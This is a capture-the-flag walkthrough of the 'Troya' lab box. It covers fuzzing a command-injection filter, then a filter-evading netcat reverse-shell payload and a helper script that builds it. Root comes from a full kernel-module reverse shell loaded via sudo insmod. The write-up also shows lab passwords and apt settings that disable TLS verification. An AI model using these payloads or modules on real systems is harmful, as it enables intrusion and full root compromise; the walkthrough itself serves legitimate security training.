Troya
Information Gathering
Port Scanning
┌──(kali㉿kali)-[~/temp/Troya]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.106:22
Open 192.168.10.106:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:b8:5e:2c:41:b8:7c:c8:20:e8:09:ff:7a:6f:ff:9f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGzDvMiSzAKx8LgRHQSGCjYQnRMIvZ3UuVvF2HOjumUrcKqsmhoqrt+r2xW6LWnViU5vLLQJrpwaoBCZPAAamZSQRttehcSjJE9JcBLg2wYC2oiMCBQ1k+QL/Iknc+eTPRVNUDKFMaOUpdbPSX2glm+m6TpA52MRS1OFqZkFsuvwM3D3iRfpB5FecYSe6ihuUaUm/O5z72rJIOsStfkM6Qe8NqnDF0DfD7vSCEiFenNJZT8djSFMQO+Bg8dXwlp6aCb8G9VWQwyjrgxTcDMv20nWvocQcRy2fNO8qC1WPRBZhVl/LjGC9eBjmH1bRHZ3ydcdZChbOa3KrdVkSxpfbF
| 256 3f:44:9f:25:14:99:40:17:e0:07:1f:2e:67:de:78:18 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEbFsO3VVPjlgJmE+s21fQoDV+WrOZALhTfD04WHrfn9cqqR3oLdkHW9DswbrxAS7fmvVN2t9IgXmcaJhXyXJtI=
| 256 c4:0e:93:55:b2:7b:8c:86:c3:e4:6d:01:93:60:d2:b1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOGTvnYiwMPSizNaaMbsjAbUAtRzcmAf71bfuB6mg++I
80/tcp open http syn-ack ttl 64 nginx 1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.14.2
| http-methods:
|_ Supported Methods: GET HEAD POST
MAC Address: 08:00:27:DA:71:C5 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory Scanning
┌──(kali㉿kali)-[~/temp/Troya]
└─$ feroxbuster -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html txt php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.10.106/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [html, txt, php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 11l 15w 153c http://192.168.10.106/index.php
200 GET 11l 15w 153c http://192.168.10.106/
Halfway through the scan nothing had turned up, so I stopped it.
Vulnerability Discovery
Footprinting
┌──(kali㉿kali)-[~/temp/Troya]
└─$ whatweb http://$IP
http://192.168.10.106 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx/1.14.2], IP[192.168.10.106], nginx[1.14.2]
<html>
<body>
<form method="post" action="/index.php">
Enter ip: <input type="text" name="command">
<input type="submit">
</form>
</body>
</html>
Testing the input box. Entering 127.0.0.1:
Trying symbols such as & | ; ' < > next:
Some of them are evidently filtered. Let's fuzz the field one character at a time to map the filter:
┌──(kali㉿kali)-[~/temp/Troya]
└─$ ffuf -u http://$IP/index.php -c -w /usr/share/seclists/Fuzzing/alphanum-case.txt -d 'command=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fw 16
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.10.106/index.php
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/alphanum-case.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : command=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 16
________________________________________________
h [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 60ms]
i [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 64ms]
s [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 72ms]
a [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 151ms]
:: Progress: [62/62] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
The four characters that survive the word-count filter (h, i, s, a) get a different response from every other letter and digit: these are the ones the filter rejects, so they cannot appear in a payload. Note that /bin/bash contains all four.
┌──(kali㉿kali)-[~/temp/Troya]
└─$ ffuf -u http://$IP/index.php -c -w /usr/share/seclists/Fuzzing/alphanum-case-extra.txt -d 'command=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fr "No"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.10.106/index.php
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/alphanum-case-extra.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : command=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Regexp: No
________________________________________________
+ [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 55ms]
/ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 79ms]
H [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 89ms]
0 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 124ms]
, [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 137ms]
! [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 156ms]
& [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 180ms]
1 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 192ms]
. [Status: 200, Size: 193, Words: 16, Lines: 13, Duration: 219ms]
3 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 256ms]
2 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 260ms]
- [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 283ms]
4 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 329ms]
5 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 337ms]
( [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 344ms]
) [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 359ms]
6 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 379ms]
7 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 407ms]
8 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 419ms]
9 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 447ms]
: [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 461ms]
$ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 495ms]
@ [Status: 200, Size: 193, Words: 16, Lines: 13, Duration: 520ms]
A [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 537ms]
? [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 546ms]
B [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 581ms]
D [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 592ms]
C [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 625ms]
E [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 670ms]
F [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 681ms]
G [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 690ms]
I [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 690ms]
J [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 674ms]
K [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 668ms]
L [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 698ms]
M [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 691ms]
N [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 696ms]
P [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 758ms]
Q [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 764ms]
O [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 785ms]
R [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 751ms]
S [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 807ms]
T [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 805ms]
V [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 784ms]
U [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 797ms]
X [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 838ms]
W [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 847ms]
Z [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 786ms]
Y [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 836ms]
\ [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 816ms]
[ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 870ms]
b [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 759ms]
_ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 805ms]
] [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 873ms]
f [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 839ms]
c [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 863ms]
e [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 865ms]
d [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 872ms]
g [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 887ms]
k [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 832ms]
j [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 899ms]
l [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 865ms]
m [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 860ms]
n [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 826ms]
o [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 835ms]
p [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 879ms]
q [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 828ms]
t [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 780ms]
r [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 857ms]
v [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 825ms]
u [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 850ms]
x [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 770ms]
w [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 788ms]
| [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 728ms]
y [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 817ms]
z [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 817ms]
[Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 658ms]
:: Progress: [95/95] :: Job [1/1] :: 55 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
The usable characters are the ones listed here. The wordlist holds the 95 printable ASCII characters; the 18 missing from this output (" # % ' * ; < = > ^ ` { } ~ and a h i s) are the rejected ones. | is allowed, so a pipe can still chain a command, but * is blocked, which leaves ? as the only glob metacharacter for spelling /bin/bash without the blocked letters. Trying a reverse shell; in practice & does not work either (a bare & in a form-urlencoded body is the parameter separator, so the server never sees it unless it is sent as %26, and its 164-byte response is the same size as for an empty input):
| nc 192.168.10.107 1234 -e /b?n/b???
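Putting the two ffuf runs together gives a usable filter map, and the payload above can be derived from it rather than guessed. The script below is an added example of mine, not part of the write-up: it holds the 18 rejected characters as a blocked set, rewrites a path by replacing every blocked character with ? (the only glob metacharacter that survived, since * is rejected), and checks against a constructed directory listing that the glob expands to exactly one file, because an ambiguous glob would hand nc several arguments. The listener address 192.168.10.107:1234 is the one used above; the directory contents are sample data, not the target's real /bin.

```shell
#!/bin/sh
# Added example, not from the original write-up: turn the ffuf results into a
# payload builder. BLOCKED holds the 18 entries of alphanum-case-extra.txt that
# never appeared in the second run. Because '*' is rejected, '?' is the only
# glob metacharacter left, so each blocked letter in a path becomes '?' and the
# shell on the target expands it back to the real file name.

BLOCKED="\"#%'*;<=>^\`{}~ahis"

# has_blocked STRING BLOCKED -> exit 0 if STRING contains any character of BLOCKED
has_blocked() {
    hb_rest=$2
    while [ -n "$hb_rest" ]; do
        hb_ch=${hb_rest%"${hb_rest#?}"}   # first character of hb_rest
        hb_rest=${hb_rest#?}
        case $1 in *"$hb_ch"*) return 0 ;; esac
    done
    return 1
}

# wildcard_path PATH BLOCKED -> PATH with every blocked character replaced by '?'
wildcard_path() {
    wp_rest=$1
    wp_out=''
    while [ -n "$wp_rest" ]; do
        wp_ch=${wp_rest%"${wp_rest#?}"}
        wp_rest=${wp_rest#?}
        if has_blocked "$wp_ch" "$2"; then
            wp_out="$wp_out?"
        else
            wp_out="$wp_out$wp_ch"
        fi
    done
    printf '%s\n' "$wp_out"
}

# count_matches GLOB -> number of existing files the unquoted GLOB expands to;
# anything other than 1 means the target's shell would pass extra arguments to nc
count_matches() {
    cm_n=0
    for cm_f in $1; do
        if [ -e "$cm_f" ]; then cm_n=$((cm_n + 1)); fi
    done
    printf '%s\n' "$cm_n"
}

# build_payload LHOST LPORT BINARY -> the injection string for the "command" field
build_payload() {
    printf '| nc %s %s -e %s\n' "$1" "$2" "$(wildcard_path "$3" "$BLOCKED")"
}

# Constructed stand-in for the target's /bin (sample names, not taken from the box).
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir "$demo/bin"
for n in bash bunzip2 bzcat bzip2 bzless cat dash ls sh; do
    : > "$demo/bin/$n"
done

safe=$(wildcard_path /bin/bash "$BLOCKED")   # /b?n/b???
echo "glob: $safe  matches in sample listing: $(count_matches "$demo$safe")"
echo "payload: $(build_payload 192.168.10.107 1234 /bin/bash)"
```

Running it prints the glob /b?n/b??? with a single match and the payload line used above. A shorter target such as /bin/sh would become /b?n/??, which in the sample listing matches both ls and sh; that is why the uniqueness check is worth keeping before sending the payload.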
Privilege Escalation
Information Gathering
(remote) www-data@troya:/var/www/html$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 22 2020 .
drwxr-xr-x 3 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 root root 518 Oct 22 2020 index.php
-rw-r--r-- 1 root root 13 Oct 22 2020 secret.pdf
(remote) www-data@troya:/var/www/html$ cat secret.pdf
cGF6endvcmQK
(remote) www-data@troya:/var/www/html$ cat /etc/passwd | grep sh | cut -d: -f1
root
paul
sshd
hector
helena
(remote) www-data@troya:/var/www/html$ ls -la /home
total 20
drwxr-xr-x 5 root root 4096 Oct 22 2020 .
drwxr-xr-x 18 root root 4096 Oct 22 2020 ..
drwxr-xr-x 2 hector hector 4096 Oct 22 2020 hector
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 helena
drwxr-xr-x 2 paul paul 4096 Oct 22 2020 paul
(remote) www-data@troya:/var/www/html$ cd /home/hector/
(remote) www-data@troya:/home/hector$ ls -la
total 20
drwxr-xr-x 2 hector hector 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 hector hector 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 hector hector 3526 Oct 22 2020 .bashrc
-rw-r--r-- 1 hector hector 807 Oct 22 2020 .profile
(remote) www-data@troya:/home/hector$ cd ../helena/
(remote) www-data@troya:/home/helena$ ls -la
total 28
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 helena helena 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 helena helena 3526 Oct 22 2020 .bashrc
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .local
-rw-r--r-- 1 helena helena 807 Oct 22 2020 .profile
-rw------- 1 helena helena 11 Oct 22 2020 user.txt
(remote) www-data@troya:/home/helena$ cd .local/
(remote) www-data@troya:/home/helena/.local$ ls -la
total 12
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 ..
drwx------ 3 helena helena 4096 Oct 22 2020 share
(remote) www-data@troya:/home/helena/.local$ cd ../../paul/
(remote) www-data@troya:/home/paul$ ls -la
total 24
drwxr-xr-x 2 paul paul 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw------- 1 paul paul 51 Oct 22 2020 .Xauthority
-rw-r--r-- 1 paul paul 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 paul paul 3526 Oct 22 2020 .bashrc
-rw-r--r-- 1 paul paul 807 Oct 22 2020 .profile
Database Leak
The secret.pdf we found must be useful. It looks odd, so check whether it is encoded: its content cGF6endvcmQK is base64 for pazzword.
Switching users with it failed, but a MySQL service is listening on localhost, and hector can log in to it with the password pazzword!
(remote) www-data@troya:/home/paul$ ss -tnlup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=471,fd=6))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 [::]:80 [::]:* users:(("nginx",pid=471,fd=7))
tcp LISTEN 0 128 [::]:22 [::]:*
(remote) www-data@troya:/var/www/html$ mysql -u hector -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.3.25-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| yo |
+--------------------+
2 rows in set (0.017 sec)
MariaDB [(none)]> use yo;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [yo]> show tables;
+--------------+
| Tables_in_yo |
+--------------+
| lucky |
+--------------+
1 row in set (0.000 sec)
MariaDB [yo]> select * from lucky;
+----+--------+--------------------+
| id | uzer | pazz |
+----+--------+--------------------+
| 1 | helena | iuyqwejkhdsaiuyewq |
+----+--------+--------------------+
1 row in set (0.000 sec)
MariaDB [yo]> exit
Bye
Try switching user with the credentials from the database:
Privilege escalation to root via insmod
helena@troya:~$ ls -la
total 28
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 helena helena 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 helena helena 3526 Oct 22 2020 .bashrc
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .local
-rw-r--r-- 1 helena helena 807 Oct 22 2020 .profile
-rw------- 1 helena helena 11 Oct 22 2020 user.txt
helena@troya:~$ cat user.txt
pleasestop
helena@troya:~$ sudo -l
Matching Defaults entries for helena on troya:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User helena may run the following commands on troya:
(ALL) NOPASSWD: /usr/sbin/insmod
What on earth is this:
On Linux, insmod (install module) loads a module into the kernel.
Many Linux features are implemented as modules that are loaded into the kernel only when needed; this keeps the kernel small and efficient while staying flexible. Such loadable modules are usually device drivers.
Syntax
insmod [-fkmpsvxX][-o <module name>][module file][symbol name = symbol value]
Parameters:
- -f Force-load the module without checking that the running kernel version matches the one the module was compiled for.
- -k Mark the module for automatic removal.
- -m Print the module's load map.
- -o <module name> Set the module's name; the module file's name may be used.
- -p Probe whether the module can be loaded into the kernel correctly.
- -s Log all messages to the system log.
- -v Verbose output.
- -x Do not export the module's external symbols.
- -X Export all of the module's external symbols (the default).
That option list describes the old modutils insmod. The kmod insmod shipped with Debian 10 takes only a module file and module parameters, as its help output shows:
helena@troya:~$ /usr/sbin/insmod --help
Usage:
insmod [options] filename [args]
Options:
-V, --version show version
-h, --help show this help
helena@troya:~$ /usr/sbin/insmod -V
kmod version 26
+XZ -ZLIB +OPENSSL -EXPERIMENTAL
Reference: https://book.hacktricks.wiki/zh/linux-hardening/privilege-escalation/linux-capabilities.html?highlight=insmod#cap_sys_module
// reverse-shell.c
#include <linux/init.h>
#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

// Command run from kernel context: an interactive bash with its stdio
// redirected to the attacker's listener on 192.168.10.107:2345.
static char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.10.107/2345 0>&1", NULL};
static char *envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

// call_usermodehelper creates a user-mode process from kernel space; the
// process runs as root no matter which user loaded the module. UMH_WAIT_EXEC
// returns as soon as the exec has happened, so insmod does not block on the shell.
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
// Makefile
obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
In the Makefile, the whitespace before each make must be a tab, not spaces! In vim: set noexpandtab
The target has no make, so try compiling locally and uploading the module:
┌──(kali㉿kali)-[~/temp/Troya]
└─$ cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules$
$
clean:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean$
Everything from here on is trial and error.
make failed:
┌──(kali㉿kali)-[~/temp/Troya]
└─$ make
make -C /lib/modules/6.12.25-amd64/build M=/home/kali/temp/Troya modules
make[1]: Entering directory '/home/kali/temp/Troya'
make[1]: *** /lib/modules/6.12.25-amd64/build: No such file or directory. Stop.
make[1]: Leaving directory '/home/kali/temp/Troya'
make: *** [Makefile:4: all] Error 2
The running Kali kernel is 6.12 and its build directory is not installed; more importantly, the Makefile builds against whatever uname -r reports on the build host, and a module built for 6.12 would not load on the target's 4.19 kernel anyway. The kernel version has to be chosen by hand to match the target, either by building inside a VM that runs that kernel or by pointing the -C path at the target kernel's headers.
This write-up was useful for reference: https://nepcodex.com/2023/01/troya-walkthrough-from-hackmyvm-writeup/
I did this in VMware; all that matters is the final .ko file anyway.
helena@troya:/tmp$ uname -a
Linux troya 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
The same kernel version (at least its headers) has to be installed to proceed.
Replay of the failed attempts
┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list
#
# deb cdrom:[Debian GNU/Linux 10.4.0 _Buster_ - Official amd64 xfce-CD Binary-1 20200509-10:26]/ buster main
#deb cdrom:[Debian GNU/Linux 10.4.0 _Buster_ - Official amd64 xfce-CD Binary-1 20200509-10:26]/ buster main
deb http://deb.debian.org/debian buster main contrib non-free
deb http://security.debian.org/debian-security buster/updates main
deb-src http://security.debian.org/debian-security buster/updates main
deb [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster main contrib non-free
deb-src [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster main contrib non-free
deb [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster/updates main
deb-src [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster/updates main
# buster-updates, previously known as 'volatile'
# A network mirror was not selected during install. The following entries
# are provided as examples, but you should amend them as appropriate
# for your mirror of choice.
#
# deb http://deb.debian.org/debian/ buster-updates main
# deb-src http://deb.debian.org/debian/ buster-updates main
# This system was installed using small removable media
# (e.g. netinst, live or single CD). The matching "deb cdrom"
# entries were disabled at the end of the installation process.
# For information about how to configure apt package sources,
# see the sources.list(5) manual.
Then, to get past apt's Valid-Until check (the Release files on snapshot.debian.org are long expired), create a new config file in /etc/apt/apt.conf.d/ (e.g. 99nocheckvalid.conf) with the following contents:
┌──(kali㉿kali)-[~]
└─$ ls -la /etc/apt/apt.conf.d
total 36
drwxr-xr-x 2 root root 4096 Jan 26 2024 .
drwxr-xr-x 8 root root 4096 Jun 27 11:59 ..
-rw-r--r-- 1 root root 399 Sep 20 2023 01autoremove
-r--r--r-- 1 root root 496 Nov 30 2023 02autoremove-postgresql
-rw-r--r-- 1 root root 2164 Sep 10 2022 50apt-file.conf
-rw-r--r-- 1 root root 654 May 21 2023 50command-not-found
-rw-r--r-- 1 root root 91 Nov 26 2023 50kali
-rw-r--r-- 1 root root 182 Jan 8 2023 70debconf
-rw-r--r-- 1 root root 142 Dec 13 2017 80debtags
┌──(kali㉿kali)-[~]
└─$ cd $_
# sudo vim 99nocheckvalid.conf # naming rule: start with a number (e.g. 99) so the file is loaded last.
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ cat 99nocheckvalid.conf
Acquire::Check-Valid-Until "false";
# sudo vim 99noverifycert.conf
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ cat $_
// Do not verify peer certificate
Acquire::https::Verify-Peer "false";
// Do not verify that certificate name matches server name
Acquire::https::Verify-Host "false";
Then run apt update so the configuration takes effect. (Verify-Peer and Verify-Host only switch off TLS certificate checking for the mirror; apt still verifies the Release signatures against the archive keys, so this is a convenience on a disposable build VM rather than a setting to keep.)
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ sudo apt update
Then install the kernel headers and image for the target's version:
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ sudo apt install linux-headers-4.19.0-12-amd64 linux-image-4.19.0-12-amd64 build-essential
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package linux-headers-4.19.0-12-amd64
E: Couldn't find any package by glob 'linux-headers-4.19.0-12-amd64'
E: Unable to locate package linux-image-4.19.0-12-amd64
E: Couldn't find any package by glob 'linux-image-4.19.0-12-amd64'
Damn, this version is not available from these sources.
I'll have to find a ready-built one, or, failing that, ask the group admin for it.
Once the module finally compiles, run:
sudo insmod reverse-shell.ko
and the root shell comes back to the listener.
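The loading step hinges on one detail that the build errors above keep running into: the .ko is stamped with the release of the headers it was built against, and the target kernel compares that vermagic string with its own uname -r before accepting the module; on a mismatch insmod fails with "Invalid module format". The script below is an added example of mine, not code from the write-up or from the hacktricks page: it reads the vermagic with kmod's modinfo on the build host and compares its release field with the target's uname -r, so a mismatch is caught before the file is uploaded. It assumes the module is named reverse-shell.ko as above; the vermagic strings in the comments and tests are illustrative.

```shell
#!/bin/sh
# Added example, not from the original write-up: verify that a compiled module
# was built for the kernel release the target runs. The release is the first
# word of the vermagic string embedded in the .ko, e.g.
#   "4.19.0-12-amd64 SMP mod_unload modversions "
# and it must equal `uname -r` on the target for insmod to accept the file.
# Assumes kmod's modinfo is available on the build host.

# vermagic_release VERMAGIC -> the release field (first word) of a vermagic string
vermagic_release() {
    set -- $1
    printf '%s\n' "$1"
}

# module_matches_kernel VERMAGIC TARGET_RELEASE -> exit 0 if the module was built for TARGET_RELEASE
module_matches_kernel() {
    [ "$(vermagic_release "$1")" = "$2" ]
}

# check_ko KO_FILE TARGET_RELEASE -> read the vermagic with modinfo and compare;
# exit 0 on match, 1 on mismatch, 2 if modinfo could not read the file
check_ko() {
    ck_vm=$(modinfo -F vermagic "$1") || return 2
    if module_matches_kernel "$ck_vm" "$2"; then
        printf 'OK: %s is built for %s\n' "$1" "$2"
    else
        printf 'MISMATCH: %s carries "%s" but the target runs %s\n' "$1" "$ck_vm" "$2" >&2
        return 1
    fi
}

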